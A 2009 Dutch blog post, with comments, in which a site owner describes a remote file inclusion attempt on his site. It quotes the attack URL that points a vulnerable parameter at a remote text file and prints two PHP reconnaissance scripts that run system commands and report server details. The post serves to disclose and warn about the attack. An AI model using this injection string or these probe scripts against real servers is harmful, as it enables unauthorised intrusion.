Skip to content

United Albanians Hackers

Hackers op bezoek bij Doede.net

Ik zag in de logs van Counterize dat iemand vanuit Albanie ofwel Hongarije probeert onze website te hacken. Door middel van deze link aaneen te breien: http://www.doede.net/tag/web-development//ecommerce/payment/cybersource.php?path[docroot]=http://www.lidoestensi.com/dmdocuments/root/glup.txt? proberen ze onze site in te komen.

Hack script

In glup.txt staat een stuk PHP:

echo "ALBANIA<br>";
  $alb = @php_uname();
  $alb2 = system(uptime);
  $alb3 = system(id);
  $alb4 = @getcwd();
  $alb5 = getenv("SERVER_SOFTWARE");
  $alb6 = phpversion();
  $alb7 = $_SERVER['SERVER_NAME'];
  $alb8 = gethostbyname($SERVER_ADDR);
  $alb9 = get_current_user();
  $os = @PHP_OS;
  echo "os: $os<br>";
  echo "uname -a: $alb<br>";
  echo "uptime: $alb2<br>";
  echo "id: $alb3<br>";
  echo "pwd: $alb4<br>";
  echo "user: $alb9<br>";
  echo "phpv: $alb6<br>";
 echo "SoftWare: $alb5<br>";
 echo "ServerName: $alb7<br>";
 echo "ServerAddr: $alb8<br>";
 echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
 exit; 

Wie zijn zij

Dit script staat op http://www.lidoestensi.com. Een ander iets uitgebreider script wordt gehost op http://www.gsmch.org/club/chi.txt??. Let op! Deze laatste link gaat direct naar het script. Of de eerst genoemde site en script er zelf bij betrokken is of niet zal nog uitgezocht moeten worden. In het script staat een echo: UNITED ALBANIANS aka ALBOSS PARADISE Ze willen blijkbaar doorgeven wie ze zijn of ons om de tuin leiden natuurlijk.

De schade

Zover ik heb kunnen nagaan is het niet gelukt. Maar an alle aanvallen die op andere WordPress blogs hebben plaatsgevonden kun je niet voorzichtig genoeg zijn. Al zal alle zaken nog eens goed nakijken. In de database en in de bestanden die op de server staan Als het script als php script op mijn local server wordt “afgespeeld” krijg je dit te zien:

ALBANIA
os: WINNT
uname -a: Windows NT ACER4520 5.1 build 2600
uptime:
id:
pwd: C:wampwww
user:
 SYSTEM
phpv: 5.2.6
SoftWare: Apache/2.2.8 (Win32) PHP/5.2.6
ServerName: localhost
ServerAddr: 127.0.0.1
UNITED ALBANIANS aka ALBOSS PARADISE

Er wordt dus informatie getoond over de server. Verder werd mijn virusscanner meteen zenuwachtig en wilde het bestand direkt verwijderen. Mijn lokale WAMP server staat echter niet open voor de rest van het internet dus daarover hoe ik mij geen zorgen te maken.

Meer informatie is ook te vinden op Netzhappen.de waarna deze blog met een trackback verwijst.

Gepubliceerd door Doede op woensdag 3 juni 2009
3 Reacties
  1. Hello,

    I found this url http://www.gsmch.org/club/chi.txt?? in the logfiles of http://www.eilenburg.de
    Do you know a way to protect the server against this hacking? I searched hours with google and found your description. But what can I do against this attack?

    yours sincerly Carsten Lippert

    Maybe you can answer in german?

  2. Ich sah einige errors aud deine Typo3 Seite:

    Warning: Invalid argument supplied for foreach() in /html/typo3conf/ext/cooluri/class.tx_cooluri.php on line 424

    Warning: implode() [function.implode]: Invalid arguments passed in /html/typo3conf/ext/cooluri/class.tx_cooluri.php on line 425

    Hast Du der letzte Typo3 version?
    Kamen die errors nachdem Du das besuch der Hackers im error log gesehen hattest?

    Dass script dass auf gsmuch.org steht ist:

    function ConvertBytes($number)
    {
    $len = strlen($number);
    if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len < =6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len < =9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "chitoz
    “;
    $un = @php_uname();
    $up = system(uptime);
    $id1 = system(id);
    $pwd1 = @getcwd();
    $sof1 = getenv(“SERVER_SOFTWARE”);
    $php1 = phpversion();
    $name1 = $_SERVER[‘SERVER_NAME’];
    $ip1 = gethostbyname($SERVER_ADDR);
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;

    echo “chitoz was here ..
    “;
    echo “uname -a: $un
    “;
    echo “os: $os
    “;
    echo “uptime: $up
    “;
    echo “id: $id1
    “;
    echo “pwd: $pwd1
    “;
    echo “php: $php1
    “;
    echo “software: $sof1
    “;
    echo “server-name: $name1
    “;
    echo “server-ip: $ip1
    “;
    echo “free: $free
    “;
    echo “used: $used
    “;
    echo “total: $all
    “;
    exit;

    und nicht dasselbere script. ich muss mal sehen was dass macht. Der autor ist Chitoz. Ich werde spaeter mehr information platzen. Du kannst am besten auch deine ISP informieren..

  3. Habe gerade dass script getest und das wirkt gar nicht also kein Problem. ABER Du sollst just in case deine ISP informieren. Es passiert heute sehr oft und vielleicht ist es alles viel complexer dann wir denken.

Laat een reactie achter

NB: XHTML is toegstaan. Je email adres wordt niet gepubliceerd.

Abonneer je op de reacties op dit artikel via RSS

*